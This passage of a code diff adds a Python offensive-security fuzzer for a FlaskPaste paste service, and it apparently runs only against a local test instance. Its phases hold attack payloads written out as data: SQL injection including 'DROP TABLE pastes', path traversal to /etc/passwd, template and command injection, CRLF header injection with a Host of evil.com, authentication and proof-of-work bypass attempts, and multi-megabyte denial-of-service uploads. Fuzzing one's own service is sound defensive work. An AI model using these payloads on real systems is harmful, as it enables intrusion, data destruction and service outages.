# PASS, FAIL, ERROR, TIMEOUT + duration: float + requests: int = 0 + findings: list[Finding] = field(default_factory=list) + errors: list[str] = field(default_factory=list) + + +class FlaskPasteFuzzer: + """Comprehensive fuzzer for FlaskPaste.""" + + def __init__( + self, + target: str = "http://127.0.0.1:5099", + fuzz_dir: Path | None = None, + verbose: bool = False, + ): + self.target = target + self.fuzz_dir = fuzz_dir or Path(tempfile.mkdtemp(prefix="flaskpaste-fuzz-")) + self.verbose = verbose + self.findings: list[Finding] = [] + self.results: list[FuzzResult] = [] + self.server_proc: subprocess.Popen | None = None + + # Create directories + (self.fuzz_dir / "db").mkdir(parents=True, exist_ok=True) + (self.fuzz_dir / "logs").mkdir(exist_ok=True) + (self.fuzz_dir / "crashes").mkdir(exist_ok=True) + (self.fuzz_dir / "results").mkdir(exist_ok=True) + + def log(self, msg: str, level: str = "INFO") -> None: + """Log message.""" + if self.verbose or level in ("ERROR", "CRITICAL", "FINDING"): + symbol = {"INFO": "●", "ERROR": "✗", "FINDING": "⚠", "OK": "✓"}.get( + level, "●" + ) + print(f"{symbol} {msg}") + + def start_server(self) -> bool: + """Start isolated FlaskPaste instance.""" + self.log("Starting isolated FlaskPaste instance...") + + env = os.environ.copy() + env.update( + { + "FLASKPASTE_DATABASE": str(self.fuzz_dir / "db" / "fuzz.db"), + "FLASKPASTE_SECRET_KEY": f"fuzz-{os.urandom(16).hex()}", + "FLASKPASTE_PKI_PASSWORD": "fuzz-pki-password", + "FLASKPASTE_REGISTRATION_ENABLED": "true", + "FLASKPASTE_POW_DIFFICULTY": "1", + "FLASKPASTE_RATE_LIMIT_ENABLED": "false", + "FLASKPASTE_PROXY_SECRET": "", + "FLASK_ENV": "development", + "FLASK_DEBUG": "0", + } + ) + + project_root = Path(__file__).parent.parent.parent + log_file = open(self.fuzz_dir / "logs" / "server.log", "w") + + self.server_proc = subprocess.Popen( + [ + str(project_root / "venv" / "bin" / "python"), + "run.py", + "--host", + "127.0.0.1", + "--port", + "5099", + ], + cwd=project_root, + env=env, + stdout=log_file, + stderr=subprocess.STDOUT, + ) + + # Wait for server to start + for _ in range(30): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(1) + sock.connect(("127.0.0.1", 5099)) + sock.close() + self.log("Server started successfully", "OK") + return True + except (ConnectionRefusedError, socket.timeout): + time.sleep(0.5) + + self.log("Server failed to start", "ERROR") + return False + + def stop_server(self) -> None: + """Stop the fuzzing server.""" + if self.server_proc: + self.server_proc.terminate() + try: + self.server_proc.wait(timeout=5) + except subprocess.TimeoutExpired: + self.server_proc.kill() + self.log("Server stopped") + + def http_request( + self, + method: str, + path: str, + data: bytes | None = None, + headers: dict[str, str] | None = None, + timeout: float = 5.0, + ) -> tuple[int | None, bytes, float]: + """Make HTTP request, return (status, body, duration).""" + import http.client + import urllib.parse + + parsed = urllib.parse.urlparse(self.target) + start = time.perf_counter() + + try: + conn = http.client.HTTPConnection(parsed.hostname, parsed.port, timeout=timeout) + hdrs = headers or {} + if data: + hdrs.setdefault("Content-Length", str(len(data))) + + conn.request(method, path, body=data, headers=hdrs) + resp = conn.getresponse() + body = resp.read() + duration = time.perf_counter() - start + conn.close() + return resp.status, body, duration + except Exception as e: + duration = time.perf_counter() - start + return None, str(e).encode(), duration + + # ───────────────────────────────────────────────────────────────────────── + # Phase 1: Reconnaissance + # ───────────────────────────────────────────────────────────────────────── + + def phase1_recon(self) -> FuzzResult: + """Phase 1: Reconnaissance and enumeration.""" + self.log("Phase 1: Reconnaissance") + start = time.time() + requests = 0 + findings = [] + + # Known endpoints + endpoints = [ + "/", + "/health", + "/challenge", + "/client", + "/register", + "/pastes", + "/pki", + "/pki/ca", + "/pki/ca.crt", + "/pki/issue", + "/pki/certs", + "/audit", + ] + + # Hidden endpoint discovery + hidden_tests = [ + "/admin", + "/debug", + "/config", + "/env", + "/.env", + "/robots.txt", + "/sitemap.xml", + "/.git/config", + "/api", + "/api/v1", + "/swagger", + "/docs", + "/graphql", + "/metrics", + "/prometheus", + "/__debug__", + "/server-status", + "/phpinfo.php", + "/wp-admin", + ] + + for path in endpoints + hidden_tests: + status, _, _ = self.http_request("GET", path) + requests += 1 + if status and status not in (404, 405): + self.log(f" {status} {path}") + if path in hidden_tests and status == 200: + findings.append( + Finding( + severity="MEDIUM", + category="Info", + endpoint=f"GET {path}", + vector="URL", + description=f"Hidden endpoint accessible: {path}", + reproduction=f"curl {self.target}{path}", + impact="Information disclosure, potential attack surface", + ) + ) + + # HTTP method enumeration + methods = ["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS", "HEAD", "TRACE"] + for method in methods: + status, body, _ = self.http_request(method, "/") + requests += 1 + if method == "TRACE" and status == 200: + findings.append( + Finding( + severity="LOW", + category="Info", + endpoint="TRACE /", + vector="HTTP Method", + description="TRACE method enabled", + reproduction=f"curl -X TRACE {self.target}/", + impact="Cross-site tracing (XST) possible", + ) + ) + + self.findings.extend(findings) + return FuzzResult( + phase="1", + test="Reconnaissance", + status="PASS", + duration=time.time() - start, + requests=requests, + findings=findings, + ) + + # ───────────────────────────────────────────────────────────────────────── + # Phase 2: Input Fuzzing + # ───────────────────────────────────────────────────────────────────────── + + def phase2_input_fuzzing(self) -> FuzzResult: + """Phase 2: Input fuzzing.""" + self.log("Phase 2: Input Fuzzing") + start = time.time() + requests = 0 + findings = [] + errors = [] + + # Paste content fuzzing + payloads = [ + b"normal text", + b"\x00" * 100, # Null bytes + b"\xff" * 100, # High bytes + os.urandom(1000), # Random binary + b"A" * 100000, # Large payload + "".join(random.choices(string.printable, k=1000)).encode(), + "\u202e" * 100, # RTL override + "A\u0300" * 100, # Combining characters + ] + + for payload in payloads: + status, body, duration = self.http_request( + "POST", + "/", + data=payload, + headers={"X-PoW-Token": "test", "X-PoW-Solution": "0"}, + ) + requests += 1 + + if status is None: + errors.append(f"Request failed: {body.decode(errors='replace')[:100]}") + elif status == 500: + findings.append( + Finding( + severity="HIGH", + category="DoS", + endpoint="POST /", + vector="Body", + description=f"Server error with payload: {payload[:50]!r}", + reproduction=f"curl -X POST {self.target}/ --data-binary ...", + impact="Potential denial of service", + evidence=body.decode(errors="replace")[:200], + ) + ) + # Save crash payload + crash_file = self.fuzz_dir / "crashes" / f"{int(time.time())}.payload" + crash_file.write_bytes(payload) + + # Header fuzzing + header_tests = [ + ("X-Forwarded-For", "' OR 1=1--"), + ("X-Forwarded-For", "127.0.0.1, 10.0.0.1, evil.com"), + ("X-SSL-Client-SHA1", "' OR 1=1--"), + ("X-SSL-Client-SHA1", "../../../etc/passwd"), + ("X-PoW-Token", "A" * 10000), + ("Host", "evil.com"), + ("Host", "evil.com\r\nX-Injected: true"), + ("X-Expiry", "-1"), + ("X-Expiry", "99999999999999999999"), + ("Content-Type", "text/html\r\nX-Injected: true"), + ] + + for header, value in header_tests: + status, body, _ = self.http_request("GET", "/", headers={header: value}) + requests += 1 + + if b"X-Injected" in body or b"true" in body: + findings.append( + Finding( + severity="HIGH", + category="Injection", + endpoint="GET /", + vector=f"Header: {header}", + description="Header injection vulnerability", + reproduction=f'curl {self.target}/ -H "{header}: {value}"', + impact="HTTP response splitting, cache poisoning", + ) + ) + + self.findings.extend(findings) + return FuzzResult( + phase="2", + test="Input Fuzzing", + status="PASS" if not errors else "ERROR", + duration=time.time() - start, + requests=requests, + findings=findings, + errors=errors, + ) + + # ───────────────────────────────────────────────────────────────────────── + # Phase 3: Injection Attacks + # ───────────────────────────────────────────────────────────────────────── + + def phase3_injection(self) -> FuzzResult: + """Phase 3: Injection attacks.""" + self.log("Phase 3: Injection Attacks") + start = time.time() + requests = 0 + findings = [] + + # SQL injection payloads + sqli_payloads = [ + "' OR '1'='1", + "1' OR '1'='1'--", + "1; DROP TABLE pastes;--", + "1 UNION SELECT * FROM sqlite_master--", + "1' AND SLEEP(5)--", + "1/**/OR/**/1=1", + ] + + for payload in sqli_payloads: + encoded = quote(payload, safe="") + + # Test in paste ID + status, body, duration = self.http_request("GET", f"/{encoded}") + requests += 1 + + # Timing-based detection + if duration > 4.5: + findings.append( + Finding( + severity="CRITICAL", + category="Injection", + endpoint=f"GET /{payload[:20]}...", + vector="paste_id", + description="Possible blind SQL injection (time-based)", + reproduction=f"curl {self.target}/{encoded}", + impact="Full database compromise", + evidence=f"Response time: {duration:.2f}s", + ) + ) + + # Error-based detection + if b"sqlite" in body.lower() or b"syntax" in body.lower(): + findings.append( + Finding( + severity="CRITICAL", + category="Injection", + endpoint=f"GET /{payload[:20]}...", + vector="paste_id", + description="SQL injection with error disclosure", + reproduction=f"curl {self.target}/{encoded}", + impact="Full database compromise", + evidence=body.decode(errors="replace")[:200], + ) + ) + + # Path traversal + traversal_payloads = [ + "../../../etc/passwd", + "....//....//....//etc/passwd", + "..%2f..%2f..%2fetc/passwd", + "..%252f..%252f..%252fetc/passwd", + ] + + for payload in traversal_payloads: + status, body, _ = self.http_request("GET", f"/{payload}") + requests += 1 + + if b"root:" in body: + findings.append( + Finding( + severity="CRITICAL", + category="Injection", + endpoint=f"GET /{payload}", + vector="paste_id", + description="Path traversal vulnerability", + reproduction=f"curl {self.target}/{payload}", + impact="Arbitrary file read", + evidence=body.decode(errors="replace")[:200], + ) + ) + + # SSTI + ssti_payloads = [ + ("{{7*7}}", b"49"), + ("{{config}}", b"SECRET_KEY"), + ("${7*7}", b"49"), + ] + + for payload, indicator in ssti_payloads: + status, body, _ = self.http_request( + "POST", + "/", + data=payload.encode(), + headers={"X-PoW-Token": "test", "X-PoW-Solution": "0"}, + ) + requests += 1 + + if indicator in body: + findings.append( + Finding( + severity="CRITICAL", + category="Injection", + endpoint="POST /", + vector="Body", + description="Server-side template injection", + reproduction=f"curl -X POST {self.target}/ -d '{payload}'", + impact="Remote code execution", + evidence=body.decode(errors="replace")[:200], + ) + ) + + # Command injection + cmd_payloads = [ + "; sleep 5", + "| sleep 5", + "$(sleep 5)", + "`sleep 5`", + ] + + for payload in cmd_payloads: + _, _, duration = self.http_request( + "POST", + "/", + data=payload.encode(), + headers={"X-PoW-Token": "test", "X-PoW-Solution": "0"}, + ) + requests += 1 + + if duration > 4.5: + findings.append( + Finding( + severity="CRITICAL", + category="Injection", + endpoint="POST /", + vector="Body", + description="Command injection vulnerability", + reproduction=f"curl -X POST {self.target}/ -d '{payload}'", + impact="Remote code execution", + evidence=f"Response time: {duration:.2f}s", + ) + ) + + self.findings.extend(findings) + return FuzzResult( + phase="3", + test="Injection Attacks", + status="PASS", + duration=time.time() - start, + requests=requests, + findings=findings, + ) + + # ───────────────────────────────────────────────────────────────────────── + # Phase 4: Authentication & Authorization + # ───────────────────────────────────────────────────────────────────────── + + def phase4_auth(self) -> FuzzResult: + """Phase 4: Authentication and authorization attacks.""" + self.log("Phase 4: Auth/Authz") + start = time.time() + requests = 0 + findings = [] + + # Certificate fingerprint spoofing + fake_fingerprints = [ + "0000000000000000000000000000000000000000", + "da39a3ee5e6b4b0d3255bfef95601890afd80709", # SHA1 of empty + "ffffffffffffffffffffffffffffffffffffffff", + "' OR 1=1--", + "../../../etc/passwd", + ] + + for fp in fake_fingerprints: + status, body, _ = self.http_request( + "GET", "/pastes", headers={"X-SSL-Client-SHA1": fp} + ) + requests += 1 + + if status == 200: + findings.append( + Finding( + severity="CRITICAL", + category="Auth", + endpoint="GET /pastes", + vector="X-SSL-Client-SHA1", + description="Certificate fingerprint bypass", + reproduction=f'curl {self.target}/pastes -H "X-SSL-Client-SHA1: {fp}"', + impact="Authentication bypass", + evidence=body.decode(errors="replace")[:200], + ) + ) + + # PoW bypass + pow_bypasses = [ + ({"X-PoW-Token": "", "X-PoW-Solution": ""}, "empty"), + ({"X-PoW-Token": "invalid", "X-PoW-Solution": "0"}, "invalid token"), + ({"X-PoW-Token": "test", "X-PoW-Solution": "-1"}, "negative solution"), + ( + {"X-PoW-Token": "test", "X-PoW-Solution": "999999999999999999999"}, + "overflow", + ), + ] + + for headers, desc in pow_bypasses: + status, body, _ = self.http_request( + "POST", "/", data=b"test", headers=headers + ) + requests += 1 + + if status == 201: + findings.append( + Finding( + severity="HIGH", + category="Auth", + endpoint="POST /", + vector="PoW headers", + description=f"PoW bypass via {desc}", + reproduction=f"curl -X POST {self.target}/ -d test -H ...", + impact="Spam protection bypass", + ) + ) + + # Admin endpoint access without auth + admin_endpoints = [ + ("GET", "/pki/certs"), + ("POST", "/pki/issue"), + ("GET", "/audit"), + ] + + for method, path in admin_endpoints: + status, body, _ = self.http_request(method, path) + requests += 1 + + if status == 200: + findings.append( + Finding( + severity="HIGH", + category="Auth", + endpoint=f"{method} {path}", + vector="Missing auth", + description="Admin endpoint accessible without authentication", + reproduction=f"curl -X {method} {self.target}{path}", + impact="Unauthorized admin access", + ) + ) + + self.findings.extend(findings) + return FuzzResult( + phase="4", + test="Auth/Authz", + status="PASS", + duration=time.time() - start, + requests=requests, + findings=findings, + ) + + # ───────────────────────────────────────────────────────────────────────── + # Phase 5: Business Logic + # ───────────────────────────────────────────────────────────────────────── + + def phase5_logic(self) -> FuzzResult: + """Phase 5: Business logic attacks.""" + self.log("Phase 5: Business Logic") + start = time.time() + requests = 0 + findings = [] + + # Expiry manipulation + expiry_tests = [ + ("-1", "negative"), + ("0", "zero"), + ("99999999999999999999", "overflow"), + ("abc", "non-numeric"), + ] + + for value, desc in expiry_tests: + status, body, _ = self.http_request( + "POST", + "/", + data=b"expiry-test", + headers={ + "X-Expiry": value, + "X-PoW-Token": "test", + "X-PoW-Solution": "0", + }, + ) + requests += 1 + + if status == 201: + # Check if it was accepted without error + try: + data = json.loads(body) + if "id" in data: + findings.append( + Finding( + severity="MEDIUM", + category="Logic", + endpoint="POST /", + vector="X-Expiry", + description=f"Expiry manipulation ({desc}) accepted", + reproduction=f'curl -X POST {self.target}/ -d test -H "X-Expiry: {value}"', + impact="Paste lifetime manipulation", + ) + ) + except json.JSONDecodeError: + pass + + # Large payload DoS + sizes = [1024 * 1024, 10 * 1024 * 1024] # 1MB, 10MB + + for size in sizes: + payload = os.urandom(size) + status, body, duration = self.http_request( + "POST", + "/", + data=payload, + headers={"X-PoW-Token": "test", "X-PoW-Solution": "0"}, + timeout=30, + ) + requests += 1 + + if status == 201: + findings.append( + Finding( + severity="MEDIUM", + category="DoS", + endpoint="POST /", + vector="Body size", + description=f"Large payload ({size // 1024 // 1024}MB) accepted", + reproduction=f"dd if=/dev/urandom bs=1M count={size // 1024 // 1024} | curl -X POST {self.target}/ --data-binary @-", + impact="Resource exhaustion", + evidence=f"Upload time: {duration:.2f}s", + ) + ) + elif status == 500: + findings.append( + Finding( + severity="HIGH", + category="DoS", + endpoint="POST /", + vector="Body size", + description=f"Server crash on large payload ({size // 1024 // 1024}MB)", + reproduction=f"dd if=/dev/urandom bs=1M count={size // 1024 // 1024} | curl -X POST {self.target}/ --data-binary @-", + impact="Denial of service", + ) + ) + + self.findings.extend(findings) + return FuzzResult( + phase="5", + test="Business Logic", + status="PASS", + duration=time.time() - start, + requests=requests, + findings=findings, + ) + + # ───────────────────────────────────────────────────────────────────────── + # Phase 6: Crypto + # ───────────────────────────────────────────────────────────────────────── + + def phase6_crypto(self) -> FuzzResult: + """Phase 6: Cryptographic attacks.""" + self.log("Phase 6: Cryptography") + start = time.time() + requests = 0 + findings = [] + + # Collect PoW tokens for randomness analysis + tokens = [] + for _ in range(100): + status, body, _ = self.http_request("GET", "/challenge") + requests += 1 + if status == 200: + try: + data = json.loads(body) + if "token" in data: + tokens.append(data["token"]) + except json.JSONDecodeError: + pass + + # Check for duplicate tokens + if len(tokens) != len(set(tokens)): + findings.append( + Finding( + severity="HIGH", + category="Crypto", + endpoint="GET /challenge", + vector="token", + description="Duplicate PoW tokens generated", + reproduction=f"for i in {{1..100}}; do curl -s {self.target}/challenge; done", + impact="PoW replay attack possible", + ) + ) + + # Password timing attack simulation + # Create a paste with password first would be needed + # Skipping for now as it requires state setup + + self.findings.extend(findings) + return FuzzResult( + phase="6", + test="Cryptography", + status="PASS", + duration=time.time() - start, + requests=requests, + findings=findings, + ) + + # ───────────────────────────────────────────────────────────────────────── + # Report Generation + # ───────────────────────────────────────────────────────────────────────── + + def generate_report(self) -> str: + """Generate final report.""" + severity_order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4} + sorted_findings = sorted( + self.findings, key=lambda f: severity_order.get(f.severity, 5) + ) + + report = [] + report.append("=" * 79) + report.append("FLASKPASTE OFFENSIVE SECURITY TEST REPORT") + report.append("=" * 79) + report.append(f"Generated: {time.strftime('%Y-%m-%d %H:%M:%S')}") + report.append(f"Target: {self.target}") + report.append("") + + # Summary + report.append("SUMMARY") + report.append("-" * 79) + total_requests = sum(r.requests for r in self.results) + report.append(f"Total phases run: {len(self.results)}") + report.append(f"Total requests: {total_requests}") + report.append(f"Total findings: {len(self.findings)}") + + by_severity = {} + for f in self.findings: + by_severity[f.severity] = by_severity.get(f.severity, 0) + 1 + + for sev in ["CRITICAL", "HIGH", "MEDIUM", "LOW", "INFO"]: + if sev in by_severity: + report.append(f" {sev}: {by_severity[sev]}") + + report.append("") + + # Phase Results + report.append("PHASE RESULTS") + report.append("-" * 79) + for r in self.results: + status_sym = "✓" if r.status == "PASS" else "✗" + report.append( + f"{status_sym} Phase {r.phase}: {r.test} ({r.requests} requests, {r.duration:.1f}s)" + ) + if r.findings: + report.append(f" → {len(r.findings)} findings") + if r.errors: + report.append(f" → {len(r.errors)} errors") + + report.append("") + + # Findings + if sorted_findings: + report.append("FINDINGS") + report.append("-" * 79) + for f in sorted_findings: + report.append(str(f)) + + return "\n".join(report) + + def run(self, phases: list[int] | None = None, quick: bool = False) -> None: + """Run fuzzing campaign.""" + all_phases = [ + (1, self.phase1_recon), + (2, self.phase2_input_fuzzing), + (3, self.phase3_injection), + (4, self.phase4_auth), + (5, self.phase5_logic), + (6, self.phase6_crypto), + ] + + if quick: + phases = [1, 3] # Just recon and injection for quick test + + if phases: + all_phases = [(n, f) for n, f in all_phases if n in phases] + + try: + if not self.start_server(): + print("Failed to start server, aborting") + return + + for phase_num, phase_func in all_phases: + try: + result = phase_func() + self.results.append(result) + status = "✓" if result.status == "PASS" else "✗" + self.log( + f" {status} {result.test}: {len(result.findings)} findings", + "OK" if result.status == "PASS" else "ERROR", + ) + except Exception as e: + self.log(f" Phase {phase_num} failed: {e}", "ERROR") + self.results.append( + FuzzResult( + phase=str(phase_num), + test=phase_func.__name__, + status="ERROR", + duration=0, + errors=[str(e)], + ) + ) + + # Generate and save report + report = self.generate_report() + report_file = self.fuzz_dir / "results" / "REPORT.txt" + report_file.write_text(report) + print(report) + print(f"\nReport saved to: {report_file}") + + finally: + self.stop_server() + + +def main() -> None: + parser = argparse.ArgumentParser(description="FlaskPaste Offensive Security Tester") + parser.add_argument( + "--phases", type=str, help="Comma-separated phase numbers (e.g., 1,2,3)" + ) + parser.add_argument("--quick", action="store_true", help="Quick smoke test") + parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output") + parser.add_argument("--fuzz-dir", type=str, help="Fuzzing workspace directory") + args = parser.parse_args() + + phases = None + if args.phases: + phases = [int(p.strip()) for p in args.phases.split(",")] + + fuzz_dir = Path(args.fuzz_dir) if args.fuzz_dir else None + + fuzzer = FlaskPasteFuzzer(verbose=args.verbose, fuzz_dir=fuzz_dir) + + # Handle Ctrl+C gracefully + def signal_handler(sig: int, frame: Any) -> None: + print("\nInterrupted, cleaning up...") + fuzzer.stop_server() + sys.exit(1) + + signal.signal(signal.SIGINT, signal_handler) + + fuzzer.run(phases=phases, quick=args.quick) + + +if __name__ == "__main__": + main()